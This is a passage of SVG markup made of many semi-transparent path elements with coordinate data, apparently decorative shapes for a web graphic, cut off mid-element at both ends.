48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path 